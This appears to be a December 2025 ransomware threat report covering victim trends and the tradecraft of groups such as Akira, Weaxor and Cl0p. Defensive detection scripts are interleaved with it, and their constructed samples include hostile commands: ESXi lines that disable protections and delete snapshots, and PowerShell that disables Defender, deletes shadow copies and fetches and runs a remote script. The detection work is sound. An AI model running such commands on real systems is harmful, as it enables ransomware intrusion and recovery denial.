TRACKING RANSOMWARE : DEC 2025

Published On : 2026-01-09

EXECUTIVE SUMMARY

Ransomware activity in December 2025 highlights an evolution toward cartel-style, collaborative ecosystems, where initial access, persistence, encryption, and extortion are increasingly decoupled and outsourced. December recorded the highest victim count of the year, with threat actors concentrating on high-leverage, data-dense industries where operational disruption and regulatory exposure maximize ransom pressure. Geographically, activity remained dominated by the United States, followed by Western Europe, while Asia-Pacific and Middle Eastern regions showed expanding exposure. From a tradecraft perspective, December activity emphasized abuse of trusted security tooling, hypervisor and virtualization-layer compromise for mass encryption, and data-theft-only extortion via centralized enterprise platforms, reducing reliance on custom malware. The ecosystem remains clearly bifurcated between mature operators and emerging groups such as Nova, which demonstrated consistent growth through data-centric extortion and public leak pressure.

INTRODUCTION

Welcome to the Dec 2025 Ransomware Threat Report. This report delivers a detailed analysis of the ransomware landscape, highlighting the emergence of new ransomware groups, evolving attack techniques, and notable shifts in targeted industries. By examining key trends, tactics, and significant incidents, this report aims to support organizations and security teams in understanding the current threat environment. As ransomware campaigns continue to grow in complexity, this report serves as a vital resource for anticipating future threats and strengthening proactive cybersecurity strategies.

KEY POINTS

  • Ransomware has evolved into collaborative ecosystems, with specialized actors handling access, persistence, and extortion.
  • Cartel-style ransomware models now favor affiliate scale, profit sharing, and shared infrastructure over custom malware.
  • Initial access is routinely outsourced, relying on credential abuse, social engineering, and trusted-tool misuse.
  • Trusted security tooling abuse (EDR, signed binaries, admin utilities) is a primary method for stealth and persistence.
  • Hypervisors are high-impact ransomware targets, enabling mass encryption from a single privileged compromise.
  • Exploit-to-encryption timelines are shrinking: operators now move from initial exploitation to encryption within minutes, and exploitation itself follows vulnerability disclosure closely.
  • Data-theft-only extortion is expanding via centralized enterprise file-sharing platforms.
  • Encryptor development prioritizes resilience, speed, and recovery denial over destructive techniques.
  • A clear divide exists between mature operators optimizing extortion and immature actors exposing technical flaws.
  • Ransomware is now access-driven, with infrastructure control outweighing payload sophistication.

TREND COMPARISON

Throughout December 2025, there was notable activity from several ransomware groups. Here are the trends regarding the top 10:

The November–December 2025 comparison highlights significant shifts in ransomware activity, underscoring the volatility of the ecosystem. Qilin showed strong expansion, increasing from 105 to 175 victims, consolidating its position as a leading and fast-growing threat, while Safepay and Sinobi recorded sharp rises from 14 to 68 and 22 to 50 incidents, respectively, signaling increased operational momentum. Devman and Lynx also grew from smaller baselines, indicating emerging activity. In contrast, Cl0p experienced a dramatic collapse from 101 incidents in November to just 1 in December, suggesting a near-complete pause in operations, while Akira, Play, and Incransom saw moderate declines, pointing to reduced campaign intensity or strategic realignment. Overall, the data reflects a highly dynamic ransomware landscape, with rapid gains by select actors occurring alongside abrupt slowdowns among others.

INDUSTRIES TARGETED

In December 2025, ransomware activity remained heavily concentrated on operationally critical and data-intensive sectors. Professional Goods & Services emerged as the most targeted industry with 117 victims, followed by Manufacturing (98) and Real Estate and Construction (89), highlighting sustained adversary focus on sectors with high disruption and monetization potential. Consumer Goods and Services (87), Information Technology (69), Healthcare (64), and Materials (64) also experienced elevated victimization, reflecting continued pressure on industries central to supply chains and digital operations. Government and Civic entities recorded 52 incidents, underscoring persistent exposure of public-sector organizations, while Transportation and Logistics (30) and Education (26) faced moderate activity. Lower but notable targeting was observed across Automotive and Energy and Utilities (19 each), Finance (18), and Telecommunications and Media (16). Overall, December’s distribution indicates a deliberate emphasis on professional services, manufacturing, and infrastructure-linked sectors, reinforcing ransomware groups’ preference for victims with high operational impact and ransom leverage.

TREND COMPARISON OF RANSOMWARE ATTACKS

Ransomware activity intensified markedly in December 2025, culminating in the highest monthly victim count of the year at 801 incidents, confirming a strong year-end escalation. This represented a clear increase over November’s already elevated levels and capped a renewed upward trend observed in the final quarter of 2025. The December spike suggests coordinated campaign expansion, increased affiliate participation, and sustained focus on high-value sectors such as professional services, manufacturing, and information technology. Rather than an isolated anomaly, December’s surge reflects the ransomware ecosystem’s ability to rapidly re-accelerate following earlier tactical adjustments, reinforcing its persistence and adaptability as a dominant cyber threat entering 2026.

GEOGRAPHICAL TARGETS: TOP COUNTRIES

In December 2025, ransomware targeting remained overwhelmingly concentrated in the United States, which accounted for the vast majority of observed victims with 3,769 cases, reinforcing its role as the primary global hotspot for ransomware operations. Canada (387) and Germany (296) followed at a significant distance, alongside the United Kingdom (283), France (175), and Italy (166), reflecting sustained pressure on highly digitized Western economies. Note that these per-country figures sum to well above the 801 victims recorded for December in the monthly trend above, so they cannot be a December-only count; treat the ranking, rather than the absolute numbers, as the December signal.

Notably, a sizable volume of activity was attributed to unidentified or obfuscated locations (147), indicating deliberate victim geolocation masking by threat actors. Spain (143), Brazil (131), Australia (122), and India (109) further illustrate ransomware groups’ broad geographic reach, while continued activity across Asia-Pacific and the Middle East, including Japan, Singapore, South Korea, Taiwan, and the UAE, highlights expanding regional exposure.

Overall, December’s distribution underscores a highly globalized ransomware landscape, dominated by North America and Europe but increasingly characterized by widespread, opportunistic targeting across both mature and emerging markets.

Evolutions in Ransomware Threat Landscape:

Subversion of Endpoint Trust Mechanisms to Facilitate Ransomware Intrusions
Ransomware enablement increasingly depends on initial access brokers (IABs) who specialize in stealthy foothold creation rather than direct payload deployment. The threat actor Storm-0249, operating as a ransomware-focused IAB, exemplifies this progression by weaponizing trusted endpoint security tooling to execute malware under the guise of legitimate defense activity. By abusing signed EDR components, native Windows utilities, and in-memory execution, Storm-0249 shifts ransomware preparation into a low-noise, high-trust execution context that defeats signature-based and process-trust controls. This reflects an evolution where ransomware ecosystems outsource intrusion complexity to brokers capable of delivering pre-profiled, resilient access tailored to downstream ransomware affiliates.

ETLM Assessment:
This tradecraft signals continued expansion of EDR and security-tool abuse as a preferred access method, particularly as phishing efficacy declines and detection controls mature. Future activity is likely to emphasize deeper blending of malicious logic into trusted processes, broader cross-EDR applicability, and tighter alignment with ransomware operators’ requirements, such as victim fingerprinting and key-binding preparation. As ransomware groups increasingly rely on IABs like Storm-0249, the separation between access, staging, and encryption is expected to harden, making early-stage detection substantially more challenging.
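The Storm-0249 pattern above is hard to catch with signature or process-trust controls because the binaries involved are genuinely signed. The check that does work is contextual: where a trusted binary runs from, and what it spawns. The following is an added example, not code from the report or from any vendor; the "ExampleSecurity" tool names, install paths and process-creation events are constructed stand-ins for whatever EDR an organisation actually runs.

```python
"""Flag process-creation events in which trusted security tooling or signed
binaries run outside their expected context (the Storm-0249 pattern above).
Added example: the vendor name, install paths and events are constructed
and stand in for whatever EDR an organisation actually runs."""
import ntpath

# Hypothetical allowlist: binary name -> directories it legitimately runs from.
TRUSTED_TOOLS = {
    "sensorsvc.exe": (r"C:\Program Files\ExampleSecurity\Sensor",),
    "edragent.exe": (r"C:\Program Files\ExampleSecurity\Agent",),
}
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\", "c:\\temp\\")
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "msbuild.exe", "powershell.exe"}


def assess(event: dict) -> list:
    """Return the findings for one process-creation event (Sysmon-style fields)."""
    image = event["Image"].lower()
    name = ntpath.basename(image)
    directory = ntpath.dirname(image) + "\\"
    parent = ntpath.basename(event["ParentImage"].lower())
    findings = []

    # A copied or relocated vendor binary keeps its valid signature, so a
    # signature check passes; the location is what gives it away.
    expected = TRUSTED_TOOLS.get(name)
    if expected and not any(directory.startswith(p.lower() + "\\") for p in expected):
        findings.append("trusted tool name running from unexpected directory")

    # A signed binary staged in a user-writable path is the classic
    # DLL side-loading setup: the signed host loads an attacker DLL.
    if event.get("Signed", "").lower() == "true" and directory.startswith(USER_WRITABLE):
        findings.append("signed binary executing from user-writable path")

    # Security agents have no business spawning script hosts or LOLBins.
    if name in LOLBINS and parent in TRUSTED_TOOLS:
        findings.append("LOLBin spawned by security tooling")
    return findings


# Constructed events; only the fields the rules use are included.
EVENTS = [
    {"Image": r"C:\Program Files\ExampleSecurity\Sensor\sensorsvc.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "Signed": "true"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\sensorsvc.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Signed": "true"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\ExampleSecurity\Sensor\sensorsvc.exe", "Signed": "true"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "Signed": "true"},
]


def scan(events) -> dict:
    """Map event index -> findings, omitting events with nothing to report."""
    out = {}
    for i, event in enumerate(events):
        findings = assess(event)
        if findings:
            out[i] = findings
    return out


if __name__ == "__main__":
    for i, findings in scan(EVENTS).items():
        print(i, EVENTS[i]["Image"], findings)
```

The allowlist is the part that must be maintained per environment: every path is an assumption here, and a real deployment would populate it from the EDR vendor's documented install locations and add the parent-process relationships the agent legitimately has.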

Early-Stage Ransomware Commercialization
Ransomware activity increasingly reflects non-traditional entrants attempting to operationalize extortion tooling without mature cryptographic discipline, exposing structural weaknesses during early deployment. The threat actor group CyberVolk illustrates this dynamic through its debut of VolkLocker, where ideological motivation and rapid commercialization outpaced secure implementation. While adopting a ransomware-as-a-service model, multi-platform targeting, and destructive fail-safe logic, the use of a hardcoded master encryption key materially undermined confidentiality guarantees and eroded coercive leverage. This highlights a bifurcation within the ransomware ecosystem: mature operators refining reliability and negotiation power, contrasted with emergent groups prioritizing visibility and speed at the cost of technical rigor.

ETLM Assessment:
Such ransomware initiatives are likely to undergo rapid iteration as operators correct foundational flaws and attempt to legitimize their offerings within criminal marketplaces. Future development is expected to focus on remediating cryptographic weaknesses, stabilizing builders, and expanding auxiliary tooling (e.g., RATs and keyloggers) to broaden monetization beyond encryption alone. Given the group’s ideological alignment, ransomware is likely to remain a secondary instrument—used selectively to fund operations or amplify disruption—rather than evolve into a fully optimized profit-maximization platform comparable to established RaaS leaders.

Virtualization-Layer Control
Ransomware activity is increasingly anchored in virtualization control-plane compromise, where hypervisors function as aggregation points for mass encryption. By operating above the guest OS layer, threat actor groups bypass endpoint protections and apply ransomware effects across multiple virtual machines simultaneously using native management tooling. The threat actor group Akira demonstrates this evolution by favoring hypervisor access to disable security controls, manipulate VM states, and execute ransomware with minimal on-host artifacts. This represents a shift from payload-heavy deployment to access-driven ransomware execution, where administrative control replaces malware complexity.

ETLM Assessment:
Ransomware operators are likely to continue prioritizing credential theft, management-plane access, and segmentation failures over exploit-heavy intrusion paths. Future campaigns are expected to further reduce dependence on custom binaries, instead abusing built-in hypervisor utilities to stage and trigger encryption at scale. As endpoint defenses mature, ransomware strategy is positioned to concentrate on infrastructure layers where a single compromise yields systemic impact, reinforcing hypervisors as high-value targets for large-scale extortion.

Infrastructure Control Abuse
Ransomware operations are increasingly orienting towards infrastructure-level control points, with hypervisors emerging as high-leverage targets that collapse traditional host-based security assumptions. By shifting focus from individual endpoints to the virtualization layer, threat actor groups can achieve immediate, multiplicative impact across entire environments. The threat actor group Akira exemplifies this progression, favoring hypervisor access to bypass EDR visibility, disable defensive controls at scale, and directly manipulate virtual machine states. Abuse of native management utilities, credential pivoting to management planes, and encryption executed at the storage or volume level signal a move away from malware-centric execution toward operator-driven, tool-native ransomware deployment, optimized for speed and maximum disruption.

ETLM Assessment:
This trajectory points toward sustained exploitation of control-plane blind spots where monitoring, authentication hygiene, and segmentation are weakest. Future ransomware activity is likely to further emphasize credential abuse over exploit development, increase use of built-in hypervisor tooling to avoid custom payload delivery, and tighten coupling between hypervisor compromise and mass encryption workflows. As endpoint defenses continue to mature, ransomware operators are expected to deepen investment in infrastructure dominance strategies, prioritizing environments where a single administrative failure enables simultaneous compromise of dozens or hundreds of systems.
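Both hypervisor sections above (Virtualization-Layer Control and Infrastructure Control Abuse) make the same point: the intrusion uses the hypervisor's own management commands, so the evidence is in the shell history rather than in a malware artifact. The following triage script is an added example, not from the report or from Akira's tooling. The report names no hypervisor product; VMware ESXi is assumed here because it is the platform most commonly reported in Akira intrusions, and the log lines are constructed in the layout of ESXi's /var/log/shell.log.

```python
"""Triage ESXi shell history for hypervisor-level ransomware staging.
Added example, not from the report or from Akira tooling. VMware ESXi is
assumed (the report names no product); the log lines are constructed in the
layout of /var/log/shell.log, and the command patterns are ESXi built-ins."""
import re
from datetime import datetime, timedelta

LINE = re.compile(r"^(\S+) shell\[\d+\]: \[(\w+)\]: (.*)$")

# (pattern over the command, severity, why it matters to a ransomware timeline)
RULES = [
    (r"execInstalledOnly\s+-i\s+0", "critical", "unsigned binaries allowed to execute on the host"),
    (r"esxcli network firewall set .*--enabled\s+false", "high", "host firewall disabled"),
    (r"vim-cmd vmsvc/snapshot\.removeall", "high", "snapshots deleted (recovery denial)"),
    (r"^(chmod \+x|nohup |/tmp/\S+)", "high", "dropped file made executable or launched"),
    (r"esxcli system syslog config set", "medium", "syslog configuration changed"),
    (r"esxcli software acceptance set", "medium", "VIB acceptance level changed"),
    (r"vim-cmd hostsvc/enable_ssh", "medium", "SSH service enabled"),
    (r"vim-cmd vmsvc/power\.off|esxcli vm process kill", "medium", "guest VM forced off"),
]


def parse(line: str):
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3)


def triage(lines, window=timedelta(minutes=5), threshold=3) -> dict:
    """Match each command against RULES and detect a burst of VM power-offs.

    An encryptor cannot overwrite a VMDK that a running VM holds locked, so a
    cluster of forced power-offs minutes before a dropped binary runs is the
    hypervisor-level equivalent of 'vssadmin delete shadows'."""
    findings, poweroffs = [], []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, user, cmd = parsed
        for pattern, severity, why in RULES:
            if re.search(pattern, cmd):
                findings.append((severity, user, cmd, why))
                if why == "guest VM forced off":
                    poweroffs.append(ts)
    poweroffs.sort()
    mass = any(poweroffs[i + threshold - 1] - poweroffs[i] <= window
               for i in range(len(poweroffs) - threshold + 1))
    return {"findings": findings, "mass_poweroff": mass}


# Constructed shell history: recon, control disabling, recovery denial,
# mass power-off, then a dropped binary launched against the datastore.
SAMPLE_LOG = """\
2025-12-14T02:10:41Z shell[20341]: [root]: esxcli vm process list
2025-12-14T02:11:03Z shell[20341]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 0
2025-12-14T02:11:20Z shell[20341]: [root]: esxcli network firewall set --enabled false
2025-12-14T02:12:05Z shell[20341]: [root]: vim-cmd vmsvc/snapshot.removeall 12
2025-12-14T02:12:31Z shell[20341]: [root]: vim-cmd vmsvc/power.off 12
2025-12-14T02:12:33Z shell[20341]: [root]: vim-cmd vmsvc/power.off 14
2025-12-14T02:12:35Z shell[20341]: [root]: esxcli vm process kill --type=force --world-id=2101832
2025-12-14T02:13:02Z shell[20341]: [root]: chmod +x /tmp/svc
2025-12-14T02:13:05Z shell[20341]: [root]: nohup /tmp/svc /vmfs/volumes/ &
2025-12-14T09:30:12Z shell[21877]: [vmadmin]: vim-cmd vmsvc/power.off 7
"""

if __name__ == "__main__":
    result = triage(SAMPLE_LOG.splitlines())
    print("mass power-off burst:", result["mass_poweroff"])
    for severity, user, cmd, why in result["findings"]:
        print(f"[{severity:8}] {user}: {cmd}  <- {why}")
```

Forward shell.log and auth.log off the host before any of this happens: the same operator who can run these commands can also clear the local history, so the triage only works against a copy the hypervisor cannot reach.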

Rapid Exploit-to-Encryption Workflows
Recent exploitation patterns underscore a shift toward speed-centric ransomware deployment driven by newly disclosed application-layer vulnerabilities, rather than extended intrusion campaigns. The threat actor group Weaxor leveraged React2Shell to achieve unauthenticated remote code execution and transitioned to encryption within minutes, demonstrating a tightly coupled access-to-payload workflow. Immediate execution of obfuscated PowerShell, rapid establishment of command-and-control, defensive impairment, and host-level encryption indicate an emphasis on automation and time-to-impact over stealth or persistence. The absence of lateral movement and data exfiltration aligns with Weaxor’s lineage as a rebranded continuation of lower-complexity operations, prioritizing fast monetization through exposed services rather than full-spectrum enterprise compromise.

ETLM Assessment:
This pattern suggests continued exploitation of high-impact, internet-facing application vulnerabilities immediately following disclosure, with ransomware operators competing for access before remediation occurs. Future iterations are likely to further compress the intrusion timeline through prebuilt exploit chains, automated payload staging, and minimal on-host interaction to reduce detection windows. As defenders improve patch velocity, such operators may increasingly rely on short-lived access opportunities, accepting limited blast radius in exchange for repeatable, low-effort compromise across large numbers of vulnerable endpoints.
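When the whole chain runs in minutes, the first observable on the host is usually the obfuscated PowerShell the paragraph mentions, and the encoded form hides the recovery-denial commands from naive string matching. The following is an added example, not from the report or from Weaxor: it decodes -EncodedCommand payloads from process-creation command lines and scores what they contain. The script, the command lines and the 203.0.113.10 address are constructed; the indicator patterns are generic ones a practitioner would recognise, not a published Weaxor signature.

```python
"""Decode PowerShell -EncodedCommand payloads from process-creation command
lines and score them for the defensive-impairment and staging behaviour the
Weaxor workflow above describes. Added example: the command lines, the script
and the 203.0.113.10 address are constructed; indicator patterns are generic."""
import base64
import re

IMPAIRMENT = [  # weight 3 each: protection tampering / recovery denial
    (r"Set-MpPreference\s+-Disable\w+", "Defender protection disabled"),
    (r"Add-MpPreference\s+-Exclusion\w+", "Defender exclusion added"),
    (r"vssadmin(\.exe)?\s+delete\s+shadows", "volume shadow copies deleted"),
    (r"wbadmin(\.exe)?\s+delete\s+catalog", "backup catalog deleted"),
    (r"bcdedit.*recoveryenabled\s+no", "Windows recovery disabled"),
]
STAGING = [  # weight 1 each: fetch-and-run in memory
    (r"Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile", "remote payload fetch"),
    (r"\bIEX\b|Invoke-Expression", "in-memory execution"),
]
HIDDEN = re.compile(r"-(w|win|window|windowstyle)\s+hidden|-nop\b|-noni\b", re.I)


def _is_enc_flag(tok: str) -> bool:
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
    t = tok.lower()
    return t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if _is_enc_flag(tok):
            blob = toks[i + 1]
            blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
            try:
                return base64.b64decode(blob).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline: str) -> dict:
    """Score one command line; decoded script is matched when present."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    impair = [why for pat, why in IMPAIRMENT if re.search(pat, script, re.I)]
    stage = [why for pat, why in STAGING if re.search(pat, script, re.I)]
    hidden = bool(HIDDEN.search(cmdline))
    return {
        "decoded": decoded is not None,
        "hidden": hidden,
        "hits": impair + stage,
        "score": 3 * len(impair) + len(stage) + int(hidden),
    }


# Constructed attacker script, encoded exactly as powershell.exe expects it
# (UTF-16LE, then base64), so the decode path is exercised for real.
_SCRIPT = ("Set-MpPreference -DisableRealtimeMonitoring $true; "
           "vssadmin delete shadows /all /quiet; "
           "bcdedit /set {default} recoveryenabled no; "
           "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')")
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_CMDLINES = [
    f"powershell.exe -nop -w hidden -enc {_ENCODED}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    "powershell.exe -Command Get-Service",
]

if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        result = analyze(cmdline)
        print(result["score"], result["hits"], cmdline[:60])
```

The score is only a triage aid; what matters operationally is that any non-zero impairment hit on an internet-facing application server, minutes after a web request exploiting a fresh vulnerability, is the whole intrusion, and the response window is the same minutes.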

Abuse of Enterprise File-Sharing Infrastructure
Modern ransomware operations are increasingly optimized around systemic access to shared enterprise platforms rather than host-level compromise, as reflected in the operating pattern of the threat actor group Cl0p. Repeated targeting of internet-facing file transfer and file-sharing solutions demonstrates a strategic preference for technologies that aggregate high-value data across multiple business units and users. By exploiting exposed services, Cl0p minimizes lateral movement requirements while maximizing immediate access to sensitive repositories, enabling rapid data exfiltration without reliance on widespread encryption. This marks a sustained evolution away from disruptive ransomware toward pure data-theft extortion models designed for efficiency, scale, and repeatability across similar enterprise products.

ETLM Assessment:
This pattern indicates continued focus on identifying widely deployed, externally accessible enterprise data platforms with centralized trust models and inconsistent patch hygiene. Future activity is likely to involve accelerated scanning for newly disclosed or silently patched flaws, short exploitation windows ahead of mass remediation, and rapid monetization through public leak releases rather than prolonged negotiations. Given Cl0p’s historical consistency, further campaigns are expected to follow the same playbook across adjacent products, prioritizing vendors with large global customer bases and shared architectural weaknesses over bespoke victim selection.
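With no encryptor and no lateral movement, the only telemetry a Cl0p-style file-transfer compromise leaves is the application's own access log: one client pulling many files, fast, through the legitimate download endpoint. The following bulk-download detector is an added example, not from the report or from any vendor; the log lines are constructed in Apache/nginx combined format using documentation-range addresses, and the /api/files/<id>/download path is a placeholder for whatever the product actually serves.

```python
"""Flag bulk downloads from an internet-facing file-transfer service, the
data-theft pattern the Cl0p section describes. Added example; the log lines
are constructed in combined log format with documentation-range addresses,
and the /api/files/<id>/download path is a placeholder."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) "[^"]*" "([^"]*)"')


def parse(line: str):
    m = LOG.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size, ua = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status),
            "bytes": 0 if size == "-" else int(size), "ua": ua}


def bulk_downloaders(lines, window=timedelta(minutes=10), min_files=5) -> dict:
    """Clients that fetched at least `min_files` distinct files inside `window`.

    Exfiltration through the application's own download endpoint leaves no
    malware on the host; the signal is volume and tempo per client."""
    per_ip = defaultdict(list)
    for line in lines:
        r = parse(line)
        if r and r["method"] == "GET" and r["status"] == 200 and r["path"].endswith("/download"):
            per_ip[r["ip"]].append(r)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):          # sliding window from each request
            in_window = [r for r in recs[i:] if r["ts"] - first["ts"] <= window]
            files = {r["path"] for r in in_window}
            if len(files) >= min_files:
                flagged[ip] = {"files": len(files),
                               "bytes": sum(r["bytes"] for r in in_window),
                               "agents": sorted({r["ua"] for r in in_window}),
                               "start": first["ts"].isoformat()}
                break
    return flagged


# Constructed log: a scripted client drains six files in under two minutes;
# a real user fetches two files hours apart. Upload, 404 and login lines are
# present to show they are ignored.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Dec/2025:03:12:01 +0000] "POST /api/auth/login HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:12:04 +0000] "GET /api/files/1001/download HTTP/1.1" 200 1048576 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:12:09 +0000] "GET /api/files/1002/download HTTP/1.1" 200 2097152 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:12:15 +0000] "GET /api/files/1003/download HTTP/1.1" 200 524288 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:12:41 +0000] "GET /api/files/1004/download HTTP/1.1" 200 4194304 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:13:02 +0000] "GET /api/files/1005/download HTTP/1.1" 200 1048576 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:13:40 +0000] "GET /api/files/1006/download HTTP/1.1" 200 3145728 "-" "python-requests/2.31"
203.0.113.10 - - [15/Dec/2025:03:13:55 +0000] "GET /api/files/1007/download HTTP/1.1" 404 0 "-" "python-requests/2.31"
198.51.100.7 - alice [15/Dec/2025:09:00:12 +0000] "GET /api/files/2210/download HTTP/1.1" 200 65536 "https://files.example/" "Mozilla/5.0"
198.51.100.7 - alice [15/Dec/2025:11:42:50 +0000] "GET /api/files/2215/download HTTP/1.1" 200 81920 "https://files.example/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, info in bulk_downloaders(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Tune `window` and `min_files` against a baseline of the product's normal usage before alerting on them; the thresholds here are illustrative, and the sequential file identifiers and scripted user agent in the sample are the secondary indicators a human would check next.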

Encryption-Centric Enhancements
Ransomware development is increasingly characterized by payload-level engineering sophistication rather than volume-driven deployment, as demonstrated by the threat actor group RansomHouse. The transition from linear, single-pass encryption to a multi-layered data transformation model reflects a deliberate focus on resilience, reliability, and analytical resistance. The introduction of dual-key encryption, dynamic chunk-based file processing, and non-linear execution paths makes the encryptor harder to analyse statically and its output harder to recover partially, even where only part of each file is transformed. Enhancements in memory management and buffer segregation further indicate an emphasis on operational stability in large-scale enterprise environments, particularly virtualized infrastructure, reinforcing ransomware’s role as a precision extortion mechanism rather than a blunt disruption tool.

ETLM Assessment:
This trajectory suggests continued investment in encryptor modularity, adaptive execution logic, and environment-aware payload behavior to sustain leverage during negotiations. Future developments are likely to prioritize evasion of reverse engineering, faster execution against large data stores, and deeper alignment with virtualized and cloud-heavy enterprise architectures. Rather than pursuing mass campaigns, such operators are expected to refine tooling that maximizes coercive impact per victim, potentially integrating automated orchestration across hypervisors and selectively combining encryption with data-theft-driven pressure models to preserve relevance under defensive advances.
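Chunk-based processing has a defensive consequence the paragraphs above imply but do not spell out: a file in which only some chunks are transformed has a moderate whole-file entropy, so a detector that looks for near-8-bits-per-byte files misses it, while a per-chunk profile exposes the alternating pattern. The following is an added example, not RansomHouse tooling: the document is constructed, the "encryption" is simulated by overwriting every other 4 KiB chunk with pseudo-random bytes (nothing here encrypts real data), and the 4 KiB chunk size and 7.5-bit threshold are assumptions.

```python
"""Per-chunk entropy profiling of a file hit by chunk-based (intermittent)
encryption. Added example, not RansomHouse tooling: the 'document' and the
encryption are simulated (random bytes replace every other 4 KiB chunk) so
the profile can be computed offline; nothing here encrypts real data."""
import math
import random
from collections import Counter

CHUNK = 4096            # assumed chunk size; real encryptors vary it


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-5 for text, approaching 8.0 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_sample(chunks: int = 16) -> bytes:
    """Constructed low-entropy file content standing in for a spreadsheet export."""
    line = b"Quarterly revenue by region, FY2025. Confidential; do not distribute.\n"
    return (line * (CHUNK * chunks // len(line) + 1))[: CHUNK * chunks]


def simulate_intermittent_encryption(data: bytes, every: int = 2, seed: int = 7) -> bytes:
    """Overwrite every `every`-th chunk with pseudo-random bytes.

    Models the chunked, non-linear scheme described in the text from the
    victim's side only: the untouched chunks are genuine, the rest are
    unrecoverable, and a file-level entropy check sees a mixed picture."""
    rng = random.Random(seed)
    out = bytearray(data)
    for start in range(0, len(data), CHUNK * every):
        out[start:start + CHUNK] = bytes(rng.getrandbits(8) for _ in range(CHUNK))
    return bytes(out)


def profile(data: bytes, threshold: float = 7.5) -> dict:
    """Classify each chunk as encrypted (entropy above threshold) or not."""
    per_chunk = [shannon_entropy(data[i:i + CHUNK]) for i in range(0, len(data), CHUNK)]
    flagged = [e > threshold for e in per_chunk]
    return {
        "whole_file": round(shannon_entropy(data), 2),
        "chunks_total": len(per_chunk),
        "chunks_encrypted": sum(flagged),
        # Alternating high/low chunks is the intermittent-encryption fingerprint.
        "striped": any(a != b for a, b in zip(flagged, flagged[1:])),
    }


if __name__ == "__main__":
    original = build_sample()
    print("clean   :", profile(original))
    print("attacked:", profile(simulate_intermittent_encryption(original)))
```

The `whole_file` figure for the attacked sample lands below the 7.5 threshold while half its chunks sit near 8.0; that gap is why file-level entropy heuristics in backup integrity checks or canary-file monitors should be evaluated per chunk rather than per file.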

Precision-Driven Extortion
Ransomware operations increasingly operate as managed extortion enterprises, where individual threat actors function as affiliates executing intrusions under centralized governance. In the Nefilim model, access to ransomware tooling is conditional on revenue sharing, adherence to targeting thresholds, and use of administrator-controlled infrastructure. Victim-specific payloads, individualized decryption keys, and coordinated leak-site pressure reflect a shift from opportunistic encryption toward precision extortion optimized for high-revenue organizations. The role of the threat actor Artem Aleksandrovych Stryzhak demonstrates how affiliate execution enables scale while isolating core operators from direct exposure.

ETLM Assessment:
Continuation of this model favors deeper compartmentalization between access acquisition, payload deployment, negotiation, and data-leak operations. Future iterations are likely to emphasize selective targeting based on financial size, regulatory sensitivity, and data leverage, alongside rapid rebranding to counter law-enforcement disruption. Persistent leadership linkage across multiple ransomware families, including the threat actor Volodymyr Tymoshchuk, indicates an intent to preserve operational continuity through migration rather than dissolution.

EMERGING GROUPS

Nova is an emerging ransomware group that showed clear signs of accelerating activity toward the end of 2025. The group recorded 15 victims in December 2025, up from 11 in November and 10 in October, indicating a consistent upward trajectory in operational tempo. This steady month-over-month increase suggests growing affiliate participation and improved campaign execution. Nova continues to employ a data-centric extortion model, leveraging public leak disclosures and countdown-based pressure to coerce victims across multiple sectors. The December uptick reinforces Nova’s evolution from a low-volume actor into a developing ransomware operation with expanding reach and the potential to become a more prominent threat as it enters 2026.

Source: Underground forum

KEY RANSOMWARE EVENTS

Collaborative Extortion Frameworks
